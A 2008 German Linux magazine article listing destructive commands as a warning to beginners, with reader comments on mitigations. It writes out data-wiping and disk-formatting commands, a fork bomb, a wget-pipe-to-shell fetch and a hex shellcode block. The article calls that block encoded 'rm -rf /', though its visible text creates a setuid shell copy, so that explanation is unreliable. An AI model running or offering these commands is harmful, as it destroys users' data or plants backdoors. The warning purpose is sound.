Die 7 tödlichsten Linux-Kommandos

Die 7 tödlichsten Linux-Kommandos

Tim Schürmann
21.11.2008

Der Informatikstudent Jun Auza hat in seinem TechSource Blog die siebentödlichsten Linux Kommandos zusammengetragen, die von seinen Lesernbereits fleißig um weitere Befehle ergänzt wurden. Jun Auza will mit derAufstellung insbesondere Einsteiger warnen, nicht auf angebliche Tricks von"dummen Leuten" in Foren oder Chats hereinzufallen.

Achtung! Alle im Blog und hier genannten Kommandos zerstörenwirklich ein komplettes Linux-System. Wer sie ausprobieren möchte,sollte sie am Besten in einer abgeschlossenen, virtuellen Maschine loslassen.In jedem Fall erfolgt ihre Anwendung auf eigene Gefahr!

  1. Ein Klassiker unter den Befehlen ist sicherlich
    rm -rf /
    
    Er beginnt beim Wurzelverzeichnis und löscht dann rekursiv alle anderenUnterverzeichnisse ohne weitere Nachfragen. Die Festplatte und sämtlicheeingehängten Datenträger sind anschließend leer.
  2. Als Abwandlung des ersten Befehls nennt das Blog das ziemlich kryptische
    char esp[] __attribute__ ((section(".text"))) /* e.s.p
    release */
    = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    "cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;";
    
    Dahinter verbirgt sich nichts anderes als die mit Hex-Zahlen codierte Fassungvon
    rm -rf /
    Diese unleserliche "Verpackung" soll die wahreFunktion möglichst geschickt verschleiern.
  3. Etwas schneller als das Löschen aller Verzeichnisse wäre eineFormatierung, zum Beispiel mit dem ext3-Dateisystem:
    mkfs.ext3 /dev/sda
    
    Dieser Befehl versetzt die komplette erste Festplatte (sda) ineinen jungfräulichen Zustand.
  4. Stürzen sich die ersten drei Befehle noch auf Datenträger, wischt
    :(){:|:&};:
    
    im Hauptspeicher feucht durch. Diese kryptische Zeile ist auch als forkbombbekannt. Sie produziert so lange neue Prozesse, bis das komplette Systemeinfriert und es nebenbei vielleicht noch zu einem Datenverlust kommt. Nimmtman den Befehl in ein Startskript auf, dürfe eine Anmeldung am System zumindestetwas erschwert werden.
  5. Doch zurück zur Festplatte:
    irgendeinkommando > /dev/sda
    
    Dabei steht irgendeinkommando für ein beliebiges Programm, das alsErgebnis ein paar Daten im Terminal ausspuckt. Diese schreibt der Befehl dannohne Umweg auf die erste Festplatte. In der Regel wandern dabei sämtlicheInformationen über die Partitionierung und die Dateisysteme über den Jordan.
  6. Auch für Linux existieren so genannte Root-Kits. Diese Schadprogrammenisten sich unbemerkt im System ein und verwandeln den PC in einen willenlosenZombie. Um einen Computer zu infizieren, sucht man sich im Internet einepassende Quelle und wirft dann wget an:
    wget http://www.unsicherewebseite.com -O- | sh
    
    Dieses Kommando lädt nicht nur den kompletten Internetauftritt vonunsicherewebseite.com herunter, sondern führt auch sämtlichen von dortstammenden Programmcode ohne zu murren aus.
  7. Als letzte Gefahr nennt Jun Auza in seinem Blog das /dev/nullGerät. Alles, was man dort hinschickt, wie zum Beispiel sein eigenesHeimatverzeichnis:
    mv /home/meins/* /dev/null
    
    wandert unwiederbringlich in einen virtuellen Mülleimer.

Wie die nach wie vor stetig wachsenden Kommentare im Blog zeigen, existierennoch viele weitere Methoden, sein Linux-System zu zerstören. Beispielsweisefüllt

dd if=/dev/urandom of=/dev/sda

die komplette erste Festplattemit zufälligen Zahlen.

Als Benutzer sollte man generell allen Befehlen misstrauisch gegenüber stehen,die Root-Rechte verlangen und rm -rf, dd, eine Weiterleitung (via | oder >) oder eine Festplatte (zum Beispiel "/dev/sda") als Parameter enthalten.

Ähnliche Artikel

  • Demontage
    Unter Windows laufen Sie stets Gefahr, mit unachtsamen Mausklicks das gesamte System irreparabel zu zerstören. Aber auch das freie Betriebssystem befördern Sie ruck, zuck ins Jenseits – wie, das zeigt der gefährlichste Artikel in der Geschichte des LinuxUser.
  • 20 Coole Hintergrundbilder für Netbooks
    Der auf den Philipinen lebende Linux-Fan Jun Auza hat in seinem Blog die seiner Meinung nach 20 besten Hintergrundbilder im Eee-PC-Format gesammelt.

Kommentare
Re: Die 7 tödlichsten Linux-Kommandos
Lars S., Freitag, 21. November 2008 19:14:12
Ein/Ausklappen

Diese "Deadly Commands" lassen sich ganz einfach entschärfen:
Die richtigen Rechte setzen, schon laufen 1), 2), 3) und 5) in's Leere, das heißt, der normale User bekommt nur eine Fehlermeldung.
Weil, normale User haben (bzw. sollten) keine Berechtigung haben /bin/, /sbin und generell / leerzufegen.
Und 'root' sollte wissen was er tut und erkennen was die Befehle bewirken können. :-)
Gegen 3) hilft das setzen von Limits in der /etc/security/limits.conf.
Dazu ist sie ja da.
Also sind auch solche Forkbombs entschärft.
Und gegen Schäden durch 6) und 7) hat man ja Backups von /home.

Also alles halb so wild.


[1] http://www.linux-hamburg.de/limits.html



Bewertung: 224 Punkte bei 37 Stimmen.
Den Beitrag bewerten: Gut / Schlecht
-
Re: Die 7 tödlichsten Linux-Kommandos
Lars S., Samstag, 22. November 2008 06:55:47
Ein/Ausklappen

Finde gerade die Edit nicht... :-)

> Gegen 3) hilft das setzen von Limits in der /etc/security/limits.conf.

Soll natürlich heißen: Gegen 4) hilft das setzen von Limits in der /etc/security/limits.conf.


Bewertung: 226 Punkte bei 29 Stimmen.
Den Beitrag bewerten: Gut / Schlecht

Aktuelle Fragen

Artikelsuche
Erwin Ruitenberg, 09.10.2014 07:51, 1 Antworten
Ich habe seit einige Jahre ein Dugisub LinuxUser. Dann weiß ich das irgendwann ein bestimmtes Art...
Windows 8 startet nur mit externer Festplatte
Anne La, 10.09.2014 17:25, 6 Antworten
Hallo Leute, also, ich bin auf folgendes Problem gestoßen: Ich habe Ubuntu 14.04 auf meiner...
Videoüberwachung mit Zoneminder
Heinz Becker, 10.08.2014 17:57, 0 Antworten
Hallo, ich habe den ZONEMINDER erfolgreich installiert. Das Bild erscheint jedoch nicht,...
internes Wlan und USB-Wlan-Srick
Gerhard Blobner, 04.08.2014 15:20, 2 Antworten
Hallo Linux-Forum: ich bin ein neuer Linux-User (ca. 25 Jahre Windows) und bin von WIN 8 auf Mint...
Server antwortet mit falschem Namen
oin notna, 21.07.2014 19:13, 1 Antworten
Hallo liebe Community, Ich habe mit Apache einen Server aufgesetzt. Soweit, so gut. Im Heimnet...